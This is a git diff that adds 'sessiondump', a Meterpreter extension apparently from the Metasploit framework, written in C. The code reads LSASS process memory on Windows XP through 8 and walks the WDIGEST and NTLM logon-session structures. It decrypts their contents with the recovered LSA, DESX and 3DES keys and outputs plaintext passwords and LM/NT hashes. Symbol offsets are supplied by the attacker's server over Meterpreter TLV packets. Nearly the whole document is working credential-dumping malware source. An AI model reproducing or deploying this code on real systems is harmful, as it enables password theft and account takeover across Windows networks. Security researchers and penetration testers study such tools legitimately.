+		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("[ERROR] Fail to call BcryptDecrypt() to decrypt buffer:\n\t Return Value: %.8x\n"), res);
+		OutputDebugString(buffer);
+		return FALSE;
+	}
+
+	BCryptCloseAlgorithmProvider(h3desProvider, 0);
+	BCryptDestroyKey(h3desKey);
+	if (buffer) HeapFree(GetProcessHeap(), 0, buffer); buffer = NULL;
+	if (tmp) HeapFree(GetProcessHeap(), 0, tmp); tmp = NULL;
+	if (lpIV) HeapFree(GetProcessHeap(), 0, lpIV); lpIV = NULL;
+	if (lpKeyObj) HeapFree(GetProcessHeap(), 0, lpKeyObj); lpKeyObj = NULL;
+	if (hBcryptDll) FreeLibrary(hBcryptDll);
+	return TRUE;
+}
+
+
+BOOL DecryptHashes(LPBYTE lpNtlmCredsBlock, DWORD dwLength, PCREDS_INFOS aCredsInfos, int idx_session){
+	ULONG i = 0;
+	LPBYTE buffer = NULL;
+	LPBYTE tmp = NULL;
+	UINT random = 0;
+	LPBYTE lpPlainText = NULL;
+
+	buffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, LARGE_BUFFER_SIZE * sizeof(BYTE));
+	tmp = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, SMALL_BUFFER_SIZE * sizeof(BYTE));
+
+	// OS < Vista SP1
+	if ((osvi.dwMajorVersion < 6) || (osvi.dwMajorVersion == 6 && osvi.dwMinorVersion == 0 && (_tcscmp(osvi.szCSDVersion, _T("")) == 0))){
+		LsaInitAndDecrypt(lpNtlmCredsBlock, dwLength);
+		FormatDecryptedHashes(lpNtlmCredsBlock, aCredsInfos, idx_session);
+	} else{	// OS >= Vista SP1
+		lpPlainText = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, LARGE_BUFFER_SIZE * sizeof(BYTE));
+		BcryptInitAndDecrypt(lpNtlmCredsBlock, dwLength, lpPlainText);
+		FormatDecryptedHashes(lpPlainText, aCredsInfos, idx_session);
+		if (lpPlainText) HeapFree(GetProcessHeap(), 0, lpPlainText); lpPlainText = NULL;
+	}
+	
+	if (buffer) HeapFree(GetProcessHeap(), 0, buffer); buffer = NULL;
+	if (tmp) HeapFree(GetProcessHeap(), 0, tmp); tmp = NULL;
+	return TRUE;
+}
+
+BOOL FormatDecryptedHashes(LPCBYTE lpDecryptedBlock, PCREDS_INFOS aCredsInfos, int idx_session){
+	int i = 0;
+	LPTSTR buffer = NULL, domain = NULL, username=NULL, lpszHashLM = NULL, lpszHashNT = NULL;
+	TCHAR  lpszHash[3];
+	HANDLE hLogonReader = INVALID_HANDLE_VALUE;
+
+	// Structure of decrypted NTLM_CREDS_BLOCS structure :
+	//  -------------------------------------------------------------------------------------------------------------------
+	//  | Domain Length | Domain Offset | User Length | User Offset | NTLM Hash | LM Hash | ... | Domain Name | User Name |
+	//  -------------------------------------------------------------------------------------------------------------------
+	//       4 bytes         4 bytes        4 bytes       4 bytes     16 bytes   16 bytes   ...
+
+	// In x64, 4 NTLM_CREDS_BLOCS first fields are 8 bytes long instead of 4
+
+	buffer = (LPTSTR) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, LARGE_BUFFER_SIZE * sizeof(TCHAR));
+	domain = (LPTSTR) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, LARGE_BUFFER_SIZE * sizeof(TCHAR));
+	username = (LPTSTR) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, LARGE_BUFFER_SIZE * sizeof(TCHAR));
+	lpszHashLM = (LPTSTR) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (HASH_LENGTH*2 + 1) * sizeof(TCHAR));
+	lpszHashNT = (LPTSTR) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (HASH_LENGTH*2 + 1) * sizeof(TCHAR));
+  lpszHash[2] = _T('\x00');
+
+	// Offsets of hashs in NTLM_CREDS_BLOCS are different according processor
+	#if defined _WIN64
+		_sntprintf_s(domain, LARGE_BUFFER_SIZE, _TRUNCATE, _T("%ws"), &lpDecryptedBlock[lpDecryptedBlock[8]]); // Domain Name
+		_sntprintf_s(username, LARGE_BUFFER_SIZE, _TRUNCATE, _T("%ws"), &lpDecryptedBlock[lpDecryptedBlock[24]]); // User Name
+
+		for (i = 48; i < 48+HASH_LENGTH; i++) {
+		  _stprintf_s(lpszHash, LARGE_BUFFER_SIZE, _T("%.2x"), lpDecryptedBlock[i]);
+		  _tcscat_s(lpszHashLM, (HASH_LENGTH*2 + 1), lpszHash);
+		}
+		for (i = 32; i < 32+HASH_LENGTH; i++) {
+		  _stprintf_s(lpszHash, LARGE_BUFFER_SIZE, _T("%.2x"), lpDecryptedBlock[i]);
+		  _tcscat_s(lpszHashNT, (HASH_LENGTH*2 + 1), lpszHash);
+		}
+
+	#else
+		_sntprintf_s(domain, LARGE_BUFFER_SIZE, _TRUNCATE, _T("%ws"), &lpDecryptedBlock[lpDecryptedBlock[4]]); // Domain Name
+		_sntprintf_s(username, LARGE_BUFFER_SIZE, _TRUNCATE, _T("%ws"), &lpDecryptedBlock[lpDecryptedBlock[12]]); // User Name
+
+		for (i = 32; i < 32+HASH_LENGTH; i++) {
+		  _stprintf_s(lpszHash, LARGE_BUFFER_SIZE, _T("%.2x"), lpDecryptedBlock[i]);
+		  _tcscat_s(lpszHashLM, (HASH_LENGTH*2 + 1), lpszHash);
+		}
+		for (i = 16; i < 16+HASH_LENGTH; i++) {
+		  _stprintf_s(lpszHash, LARGE_BUFFER_SIZE, _T("%.2x"), lpDecryptedBlock[i]);
+		  _tcscat_s(lpszHashNT, (HASH_LENGTH*2 + 1), lpszHash);
+		}
+
+	#endif
+	
+	_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("Decrypted hashes : %s\\%s::%s:%s:::"), domain, username, lpszHashLM, lpszHashNT);
+	OutputDebugString(buffer);
+
+	strncpy_s(aCredsInfos[idx_session].Domain, sizeof(aCredsInfos[idx_session].Domain), domain, strlen(domain));
+	aCredsInfos[idx_session].Domain[strlen(domain)] = '\0';
+	strncpy_s(aCredsInfos[idx_session].Username, sizeof(aCredsInfos[idx_session].Username), username, strlen(username));
+	aCredsInfos[idx_session].Username[strlen(username)] = '\0';
+	strncpy_s(aCredsInfos[idx_session].LMhash, sizeof(aCredsInfos[idx_session].LMhash), lpszHashLM, strlen(lpszHashLM));
+	aCredsInfos[idx_session].LMhash[strlen(lpszHashLM)] = '\0';
+	strncpy_s(aCredsInfos[idx_session].NTLMhash, sizeof(aCredsInfos[idx_session].NTLMhash), lpszHashNT, strlen(lpszHashNT));
+	aCredsInfos[idx_session].NTLMhash[strlen(lpszHashNT)] = '\0';
+
+  if (lpszHashLM) HeapFree(GetProcessHeap(), 0, lpszHashLM); lpszHashLM = NULL;
+  if (lpszHashNT) HeapFree(GetProcessHeap(), 0, lpszHashNT); lpszHashNT = NULL;
+	if (buffer) HeapFree(GetProcessHeap(), 0, buffer); buffer = NULL;
+  if (domain) HeapFree(GetProcessHeap(), 0, domain); domain = NULL;
+	if (username) HeapFree(GetProcessHeap(), 0, username); username = NULL;
+  if (hLogonReader != INVALID_HANDLE_VALUE) CloseHandle(hLogonReader);
+	return TRUE;
+}
+
+
+int GetWdigestPasswords(PCREDS_INFOS aCredsInfos){
+	LPVOID WdigestSessionList = NULL;
+	LPBYTE buffer = NULL, tmp = NULL;
+	LPTSTR lpDomain = NULL, lpUsername = NULL, lpPassword = NULL, lpPlainText = NULL;
+	int i = 0, idx_session = -1;
+	int cbSessionEntry = 0;
+
+	// pointers to SESSION_ENTRY structures
+	LPVOID lpWdigestListEntry = NULL;
+	PWDIGEST_NT51_SESSION_ENTRY lpWdigestListEntryNT51 = NULL;
+	PWDIGEST_NT52_SESSION_ENTRY lpWdigestListEntryNT52 = NULL;
+	PWDIGEST_NT6_SESSION_ENTRY lpWdigestListEntryNT6 = NULL;
+
+	// pointers to internal fields of SESSION_ENTRY structures
+	LPVOID lpSessionFlink = NULL;
+	PUNICODE_STRING lpSessionUserName = NULL;
+	PUNICODE_STRING lpSessionDomainName = NULL;
+	PUNICODE_STRING lpSessionPassword = NULL;
+	PLUID lpSessionLuid = NULL;
+	
+	if (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 1){
+		// Get size of WDIGEST_NT51_SESSION_ENTRY structure
+		cbSessionEntry = sizeof(WDIGEST_NT51_SESSION_ENTRY);
+		// Allocate memory for WDIGEST_NT51_SESSION_ENTRY
+		lpWdigestListEntryNT51 = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(WDIGEST_NT51_SESSION_ENTRY));
+		// Set pointer to the specific Windows version structure
+		lpWdigestListEntry = lpWdigestListEntryNT51;
+	} else if (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2){
+		cbSessionEntry = sizeof(WDIGEST_NT52_SESSION_ENTRY);
+		lpWdigestListEntryNT52 = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(WDIGEST_NT52_SESSION_ENTRY));
+		lpWdigestListEntry = lpWdigestListEntryNT52;
+	} else{
+		cbSessionEntry = sizeof(WDIGEST_NT6_SESSION_ENTRY);
+		lpWdigestListEntryNT6 = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(WDIGEST_NT6_SESSION_ENTRY));
+		lpWdigestListEntry = lpWdigestListEntryNT6;
+	}
+	
+	buffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, LARGE_BUFFER_SIZE * sizeof(BYTE));
+	tmp = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, SMALL_BUFFER_SIZE * sizeof(BYTE));
+	WdigestDllBaseAddr = GetDllBaseAddr(GetProcessId(hLsass), _T("wdigest.dll"));
+
+	_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("Wdigest.dll?l_LogSessList: %ph\n"), (WdigestDllBaseAddr + symbAddr.WdigestSessionList));
+	OutputDebugString(buffer);
+
+	if(!ReadProcessMemory(hLsass, (LPCVOID)(WdigestDllBaseAddr + symbAddr.WdigestSessionList), &WdigestSessionList, sizeof(WdigestSessionList), NULL)){
+		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("[ERROR] Fail to read WdigestSessionList: %d\n"), GetLastError());
+		OutputDebugString(buffer);
+		return FALSE;
+	}
+
+	if (WdigestSessionList){
+		do {
+			if (!ReadProcessMemory(hLsass, (LPCVOID) WdigestSessionList, (LPVOID) lpWdigestListEntry, cbSessionEntry, NULL)){
+				_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("[ERROR] Fail to read WdigestListEntry: %d\n"), GetLastError());
+				OutputDebugString(buffer);
+				return idx_session;
+			}
+
+			// Set pointers to internal fields of the specific Windows version structure
+			if (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 1){
+				lpSessionFlink = lpWdigestListEntryNT51->Flink;
+				lpSessionUserName = &(lpWdigestListEntryNT51->Username);
+				lpSessionDomainName = &(lpWdigestListEntryNT51->Domain);
+				lpSessionPassword = &(lpWdigestListEntryNT51->Password);
+				lpSessionLuid = &(lpWdigestListEntryNT51->LocallyUniqueIdentifier);
+			} else if (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2){
+				lpSessionFlink = lpWdigestListEntryNT52->Flink;
+				lpSessionUserName = &(lpWdigestListEntryNT52->Username);
+				lpSessionDomainName = &(lpWdigestListEntryNT52->Domain);
+				lpSessionPassword = &(lpWdigestListEntryNT52->Password);
+				lpSessionLuid = &(lpWdigestListEntryNT52->LocallyUniqueIdentifier);
+			} else{
+				lpSessionFlink = lpWdigestListEntryNT6->Flink;
+				lpSessionUserName = &(lpWdigestListEntryNT6->Username);
+				lpSessionDomainName = &(lpWdigestListEntryNT6->Domain);
+				lpSessionPassword = &(lpWdigestListEntryNT6->Password);
+				lpSessionLuid = &(lpWdigestListEntryNT6->LocallyUniqueIdentifier);
+			}
+
+			_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("WdigestListEntry->Flink: %ph\n"), lpSessionFlink);
+			OutputDebugString(buffer);
+
+			// memory allocation for username, domain and password
+			lpDomain = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (lpSessionDomainName->MaximumLength + 1) * sizeof(TCHAR));
+			lpUsername = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (lpSessionUserName->MaximumLength + 1) * sizeof(TCHAR));
+			lpPassword = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (lpSessionPassword->MaximumLength + 1) * sizeof(TCHAR));
+			
+			if(!ReadProcessMemory(hLsass, (LPCVOID) lpSessionDomainName->Buffer, (LPVOID) lpDomain, lpSessionDomainName->MaximumLength, NULL)){
+				_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("[ERROR] Fail to read Domain in memory: %d\n"), GetLastError());
+				OutputDebugString(buffer);
+				return FALSE;
+			}
+			_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("Domain: %S\n"), lpDomain);
+			OutputDebugString(buffer);
+
+			if(!ReadProcessMemory(hLsass, (LPCVOID) lpSessionUserName->Buffer, (LPVOID) lpUsername, lpSessionUserName->MaximumLength, NULL)){
+				_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("[ERROR] Fail to read Username in memory: %d\n"), GetLastError());
+				OutputDebugString(buffer);
+				return FALSE;
+			}
+			_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("Username: %S\n"), lpUsername);
+			OutputDebugString(buffer);
+
+			if(!ReadProcessMemory(hLsass, (LPCVOID) lpSessionPassword->Buffer, (LPVOID) lpPassword, lpSessionPassword->MaximumLength, NULL)){
+				_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("[ERROR] Fail to read cipher Password in memory: %d\n"), GetLastError());
+				OutputDebugString(buffer);
+				return FALSE;
+			} else{
+				if ((lpSessionLuid->LowPart != 0x3e4) && // NETWORK SERVICE LUID
+						(lpSessionLuid->LowPart != 0x3e5) && // LOCAL SERVICE LUID
+						(lpSessionLuid->LowPart != 0x3e7) // LOCALSYSTEM LUID
+						){
+					if (lpSessionPassword->MaximumLength > 0){
+						// Decrypt passwords from memory if password present
+						if ((osvi.dwMajorVersion < 6) || (osvi.dwMajorVersion == 6 && osvi.dwMinorVersion == 0 && (_tcscmp(osvi.szCSDVersion, _T("")) == 0))){
+							LsaInitAndDecrypt(lpPassword, lpSessionPassword->MaximumLength);
+						} else {
+							lpPlainText = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, LARGE_BUFFER_SIZE * sizeof(TCHAR));
+							BcryptInitAndDecrypt(lpPassword, lpSessionPassword->MaximumLength, lpPlainText);
+
+							memcpy_s(lpPassword, lpSessionPassword->MaximumLength, lpPlainText, lpSessionPassword->MaximumLength);
+							
+							if (lpPlainText) HeapFree(GetProcessHeap(), 0, lpPlainText); lpPlainText = NULL;
+						}
+
+						_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("Uncipher password: %S\n"), lpPassword);
+						OutputDebugString(buffer);
+					}
+					idx_session++;
+
+					_sntprintf_s(aCredsInfos[idx_session].Domain, sizeof(aCredsInfos[idx_session].Domain), _TRUNCATE, _T("%ws"), lpDomain);
+					_sntprintf_s(aCredsInfos[idx_session].Username, sizeof(aCredsInfos[idx_session].Username), _TRUNCATE, _T("%ws"), lpUsername);
+					_sntprintf_s(aCredsInfos[idx_session].Password, sizeof(aCredsInfos[idx_session].Password), _TRUNCATE, _T("%ws"), lpPassword);
+
+					_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("ID session : %d\n"), idx_session);
+					OutputDebugString(buffer);
+					_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("\tPassword : %s\n"), aCredsInfos[idx_session].Password);
+					OutputDebugString(buffer);
+					_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("\tUsername : %s\n"), aCredsInfos[idx_session].Username);
+					OutputDebugString(buffer);
+					_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("\tDomain : %s\n"), aCredsInfos[idx_session].Domain);
+					OutputDebugString(buffer);
+				} 
+				OutputDebugString(_T("----------------------------------------------\n"));
+			}
+
+			WdigestSessionList = lpSessionFlink;
+			// Clean Heap buffer
+			if (lpUsername) HeapFree(GetProcessHeap(), 0, lpUsername); lpUsername = NULL;
+			if (lpDomain) HeapFree(GetProcessHeap(), 0, lpDomain); lpDomain = NULL;
+			if (lpPassword) HeapFree(GetProcessHeap(), 0, lpPassword); lpPassword = NULL;
+		} while ((DWORD_PTR)lpSessionFlink != (DWORD_PTR)(WdigestDllBaseAddr + symbAddr.WdigestSessionList));
+	}
+
+	if (WdigestSessionList) WdigestSessionList = NULL;
+	if (lpWdigestListEntry) lpWdigestListEntry = NULL;
+	if (lpSessionFlink) lpSessionFlink = NULL;
+	if (lpSessionUserName) lpSessionUserName = NULL;
+	if (lpSessionDomainName) lpSessionDomainName = NULL;
+	if (lpSessionPassword) lpSessionPassword = NULL;
+	if (lpSessionLuid) lpSessionLuid = NULL;
+	if (lpWdigestListEntryNT51) HeapFree(GetProcessHeap(), 0, lpWdigestListEntryNT51); lpWdigestListEntryNT51 = NULL;
+	if (lpWdigestListEntryNT52) HeapFree(GetProcessHeap(), 0, lpWdigestListEntryNT52); lpWdigestListEntryNT52 = NULL;
+	if (lpWdigestListEntryNT6) HeapFree(GetProcessHeap(), 0, lpWdigestListEntryNT6); lpWdigestListEntryNT6 = NULL;
+	if (buffer) HeapFree(GetProcessHeap(), 0, buffer); buffer = NULL;
+	if (tmp) HeapFree(GetProcessHeap(), 0, tmp); tmp = NULL;
+	return idx_session;
+}
diff --git a/external/source/meterpreter/source/extensions/sessiondump/core.h b/external/source/meterpreter/source/extensions/sessiondump/core.h
new file mode 100755
index 000000000000..0b36a58c4478
--- /dev/null
+++ b/external/source/meterpreter/source/extensions/sessiondump/core.h
@@ -0,0 +1,170 @@
+#ifndef _METERPRETER_SOURCE_EXTENSION_SESSIONDUMP_CORE_H
+#define _METERPRETER_SOURCE_EXTENSION_SESSIONDUMP_CORE_H
+
+#include <windows.h>
+#include <tlHelp32.h>
+#include <tchar.h>
+#include <string.h>
+#include <Ntsecapi.h>
+#include <stdio.h>
+
+#define HASH_LENGTH 16
+#define LARGE_BUFFER_SIZE 2048
+#define SMALL_BUFFER_SIZE 255
+
+typedef struct _ADDRESSES{
+	LONG_PTR LsaEncryptMemoryAddr;
+	LONG_PTR LogonSessionListCountAddr;
+	LONG_PTR LogonSessionListAddr;
+	// Used for OS < Vista SP1
+	LONG_PTR FeedbackAddr;
+	LONG_PTR PDesxKeyAddr;
+	// Used for OS >= Vista SP1
+	LONG_PTR IVAddr;
+	LONG_PTR H3DesKeyAddr;
+	// Used for WDIGEST.DLL
+	LONG_PTR WdigestSessionList;
+} ADDRESSES;
+
+typedef struct _CREDS_INFOS {
+	UCHAR				Domain[256];
+	UCHAR				Username[256];
+	UCHAR				LMhash[33];
+	UCHAR				NTLMhash[33];
+	UCHAR				Password[256];
+} CREDS_INFOS, *PCREDS_INFOS;
+
+typedef struct _SESSION_ENTRY {
+  struct _SESSION_ENTRY *NextEntry;
+  struct _SESSION_ENTRY *PrevEntry;
+  LUID                       LogonId;
+  LSA_UNICODE_STRING         UserName;
+  LSA_UNICODE_STRING         LogonDomain;
+  DWORD                     Unknown1;
+  DWORD                     Unknown2;
+  PSID                       Sid;
+  ULONG                      LogonType;
+  ULONG                      Session;
+  DWORD                     Unknown3;
+  FILETIME                   FileTime;
+  LSA_UNICODE_STRING         LogonServer;
+  struct _CREDS_ENTRY        *CredsEntry; // OK for XP, not for other Windows version (offset used in code when needed)
+  // etc.
+} SESSION_ENTRY, *PSESSION_ENTRY;
+
+typedef struct _CREDS_ENTRY {
+  struct _CREDS_ENTRY      *NextEntry;
+  ULONG                    AuthenticationPackage;
+  struct _CREDS_HASH_ENTRY *CredsHashEntry;
+} CREDS_ENTRY, *PCREDS_ENTRY;
+
+typedef struct _CREDS_HASH_ENTRY {
+  struct _CREDS_HASH_ENTRY *NextEntry;
+  LSA_UNICODE_STRING       PrimaryKeyValue;
+  USHORT                   HashLength;
+  USHORT                   HashMaximumLength;
+  struct _NTLM_CREDS_BLOCK *HashBuffer;
+} CREDS_HASH_ENTRY, *PCREDS_HASH_ENTRY;
+
+typedef struct _BCRYPT_KEY_HANDLE {
+  DWORD                      Size;
+  DWORD                      Tag;         // (0x55555552)
+  VOID                       *hAlgorithm; // Pointer to _MSCRYPT_ALG_HANDLE structure, not used here
+     // This structure defines the algorithm that is used (3DES, AES, etc.) and various function pointers
+     // (MSCryptEncrypt, MSCryptGetProperty, MSCryptGenerateSymmetricKey, etc.)
+  VOID *hKey; // (struct _MSCRYPT_KEY_HANDLE * or struct _MSCRYPT_KEY_HANDLE_NT62 depends of Windows version *)
+  VOID                       *pbKeyObject;
+};
+
+typedef struct _MSCRYPT_KEY_HANDLE {
+  DWORD Size;
+  DWORD Tag;          // (0x4D53534B)
+  DWORD AlgoUsed;
+  DWORD Unknown1;
+  DWORD Unknown2;
+  DWORD KeySize;      // (168 bits)
+  DWORD cbSecret;     // (24 bytes)
+  BYTE  pbSecret[24]; // 3DES key
+  // etc.
+} *MSCRYPT_KEY_HANDLE;
+
+typedef struct _MSCRYPT_KEY_HANDLE_NT62 {
+  DWORD Size;
+  DWORD Tag;          // (0x4D53534B)
+  DWORD AlgoUsed;
+  DWORD Unknown1;
+  DWORD Unknown2;
+  DWORD KeySize;      // (168 bits)
+  DWORD Unknown3;
+  VOID *Unknown4;
+  DWORD cbSecret;     // (24 bytes)
+  BYTE  pbSecret[24]; // 3DES key
+  // etc.
+} *MSCRYPT_KEY_HANDLE_NT62;
+
+
+// WDIGEST.DLL
+
+typedef struct _WDIGEST_NT51_SESSION_ENTRY {
+  struct _WDIGEST_NT51_SESSION_ENTRY *Flink;
+  struct _WDIGEST_NT51_SESSION_ENTRY *Blink;
+  struct _WDIGEST_NT51_SESSION_ENTRY *This;		// "This" and "usageCount" are switched in x64 and next OS versions
+  DWORD_PTR usageCount;
+  LUID LocallyUniqueIdentifier;
+  DWORD_PTR unk1;
+  LSA_UNICODE_STRING RessourceType;				// only present for NT 5.1
+  LSA_UNICODE_STRING Username;
+  LSA_UNICODE_STRING Domain;
+  LSA_UNICODE_STRING Password;
+  // [..]
+
+} WDIGEST_NT51_SESSION_ENTRY, *PWDIGEST_NT51_SESSION_ENTRY;
+
+typedef struct _WDIGEST_NT52_SESSION_ENTRY {
+  struct _WDIGEST_NT52_SESSION_ENTRY *Flink;
+  struct _WDIGEST_NT52_SESSION_ENTRY *Blink;
+  DWORD_PTR usageCount;
+  struct _WDIGEST_NT52_SESSION_ENTRY *This;
+  LUID LocallyUniqueIdentifier;
+  DWORD_PTR unk1;
+  LSA_UNICODE_STRING Username;
+  LSA_UNICODE_STRING Domain;
+  LSA_UNICODE_STRING Password;
+  // [..]
+
+} WDIGEST_NT52_SESSION_ENTRY, *PWDIGEST_NT52_SESSION_ENTRY;
+
+typedef struct _WDIGEST_NT6_SESSION_ENTRY {
+  struct _WDIGEST_NT6_SESSION_ENTRY *Flink;
+  struct _WDIGEST_NT6_SESSION_ENTRY *Blink;
+  DWORD_PTR usageCount;
+  struct _WDIGEST_NT6_SESSION_ENTRY *This;
+  LUID LocallyUniqueIdentifier;
+  DWORD unk1;
+  DWORD unk2;
+  LSA_UNICODE_STRING Username;
+  LSA_UNICODE_STRING Domain;
+  LSA_UNICODE_STRING Password;
+  // [..]
+
+} WDIGEST_NT6_SESSION_ENTRY, *PWDIGEST_NT6_SESSION_ENTRY;
+
+
+// typedef for ptr to LsaEncryptMemory function in LSASRV.DLL
+typedef void (__stdcall *LsaEncryptMemoryFunction)(unsigned char *buffer, unsigned int length, int mode);
+
+DWORD_PTR GetDllBaseAddr(DWORD dwPid, LPBYTE DllName);
+BOOL GetPidByName(LPCTSTR lpszProcessName, LPDWORD lpPid);
+BOOL OpenLsass(VOID);
+BOOL CloseLsass(VOID);
+BOOL GetDataInMemory(VOID);
+BOOL GetDataInXPMemory(VOID);
+BOOL GetDataInPostVistaMemory(VOID);
+int GetHashes(PCREDS_INFOS aCredsInfos);
+BOOL DecryptHashes(LPBYTE lpNtlmCredsBlock, DWORD dwLength, PCREDS_INFOS aCredsInfos, int idx_session);
+BOOL FormatDecryptedHashes(LPCBYTE lpDecryptedBlock, PCREDS_INFOS aCredsInfos, int idx_session);
+int GetWdigestPasswords(PCREDS_INFOS aCredsInfos);
+BOOL LsaInitAndDecrypt(LPTSTR lpBuffer, size_t cbBuffer);
+BOOL BcryptInitAndDecrypt(LPTSTR lpInput, size_t cbInput, LPTSTR lpOutput);
+
+#endif
\ No newline at end of file
diff --git a/external/source/meterpreter/source/extensions/sessiondump/sessiondump.c b/external/source/meterpreter/source/extensions/sessiondump/sessiondump.c
new file mode 100755
index 000000000000..df7eb7e64b37
--- /dev/null
+++ b/external/source/meterpreter/source/extensions/sessiondump/sessiondump.c
@@ -0,0 +1,325 @@
+/*
+ *
+ * This meterpreter extension can be used to dump hashes and passwords from memory
+ * Compatible with x86 and x64 systems from Windows XP/2003 to Windows 8/2012
+ * Author : Steeve Barbeau (steeve DOT barbeau AT hsc DOT fr)
+ * http://www.hsc.fr/ressources/outils/sessiondump/index.html.en
+ *
+ */
+
+#define _CRT_SECURE_NO_DEPRECATE 1
+#include "../../common/common.h"
+#include "sessiondump.h"
+#include "../../ReflectiveDLLInjection/DelayLoadMetSrv.h"
+// include the Reflectiveloader() function, we end up linking back to the metsrv.dll's Init function
+// but this doesnt matter as we wont ever call DLL_METASPLOIT_ATTACH as that is only used by the 
+// second stage reflective dll inject payload and not the metsrv itself when it loads extensions.
+#include "../../ReflectiveDLLInjection/ReflectiveLoader.c"
+
+// this sets the delay load hook function, see DelayLoadMetSrv.h
+EnableDelayLoadMetSrv();
+
+extern HANDLE hLsass;
+extern ADDRESSES symbAddr;
+extern ULONG LogonSessionListCount;
+extern LONG_PTR LogonSessionList;
+extern OSVERSIONINFOEX osvi;
+extern BYTE g_Feedback[8];
+extern LPVOID g_pDESXKey;
+extern BYTE g_DESXKey[400];
+
+
+DWORD sendErrorTLV(int error, Packet *response, Remote *remote){
+	// Send TLV_TYPE_ERROR packet
+	DWORD res = ERROR_SUCCESS;
+	packet_add_tlv_uint(response, TLV_TYPE_ERROR, error);
+	packet_transmit_response(res, remote, response);
+	return res;
+}
+
+void SymbAddrTlvToStruct(Packet *packet, ADDRESSES *symbAddr, int nbFields){
+	// Put symbol offsets received from network in TLV format inside a ADDRESSES structure
+	Tlv tlvSymbName, tlvSymbAddr;
+	int i;
+	LPTSTR tmp = NULL;
+	tmp = calloc(SMALL_BUFFER_SIZE, sizeof(TCHAR));
+	
+	for (i=0 ; i<nbFields ; i++){
+		// Get symbol name from TLV
+		if (packet_enum_tlv(packet, i, TLV_TYPE_SYMBOLS_NAME, &tlvSymbName) != ERROR_SUCCESS){
+			continue;
+		}
+		// Get symbol address from TLV
+		if (packet_enum_tlv(packet, i, TLV_TYPE_SYMBOLS_ADDR, &tlvSymbAddr) != ERROR_SUCCESS){
+			continue;
+		}
+
+		// Store symbols addresses in appropriate ADDRESSES structure fields
+		if (!_tcscmp(_T("encryptmemory"), tlvSymbName.buffer)){
+			strncpy(tmp, tlvSymbAddr.buffer, SMALL_BUFFER_SIZE);
+			tmp[tlvSymbAddr.header.length] = '\0';
+			symbAddr->LsaEncryptMemoryAddr = atol(tmp);
+		} else if (!_tcscmp(_T("logon_session_list_addr"), tlvSymbName.buffer)){
+			strncpy(tmp, tlvSymbAddr.buffer, SMALL_BUFFER_SIZE);
+			tmp[tlvSymbAddr.header.length] = '\0';
+			symbAddr->LogonSessionListAddr = atol(tmp);
+		} else if (!_tcscmp(_T("logon_session_list_count"), tlvSymbName.buffer)){
+			strncpy(tmp, tlvSymbAddr.buffer, SMALL_BUFFER_SIZE);
+			tmp[tlvSymbAddr.header.length] = '\0';
+			symbAddr->LogonSessionListCountAddr = atol(tmp);
+		} else if (!_tcscmp(_T("feedback_addr"), tlvSymbName.buffer)){
+			strncpy(tmp, tlvSymbAddr.buffer, SMALL_BUFFER_SIZE);
+			tmp[tlvSymbAddr.header.length] = '\0';
+			symbAddr->FeedbackAddr = atol(tmp);
+		} else if (!_tcscmp(_T("deskey_ptr_addr"), tlvSymbName.buffer)){
+			strncpy(tmp, tlvSymbAddr.buffer, SMALL_BUFFER_SIZE);
+			tmp[tlvSymbAddr.header.length] = '\0';
+			symbAddr->PDesxKeyAddr = atol(tmp);
+		} else if (!_tcscmp(_T("threedeskey_ptr_addr"), tlvSymbName.buffer)){
+			strncpy(tmp, tlvSymbAddr.buffer, SMALL_BUFFER_SIZE);
+			tmp[tlvSymbAddr.header.length] = '\0';
+			symbAddr->H3DesKeyAddr = atol(tmp);
+		} else if (!_tcscmp(_T("iv_addr"), tlvSymbName.buffer)){
+			strncpy(tmp, tlvSymbAddr.buffer, SMALL_BUFFER_SIZE);
+			tmp[tlvSymbAddr.header.length] = '\0';
+			symbAddr->IVAddr = atol(tmp);
+		} else if (!_tcscmp(_T("wdigest_session_list"), tlvSymbName.buffer)){
+			strncpy(tmp, tlvSymbAddr.buffer, SMALL_BUFFER_SIZE);
+			tmp[tlvSymbAddr.header.length] = '\0';
+			symbAddr->WdigestSessionList = atol(tmp);
+		}
+	}
+};
+
+
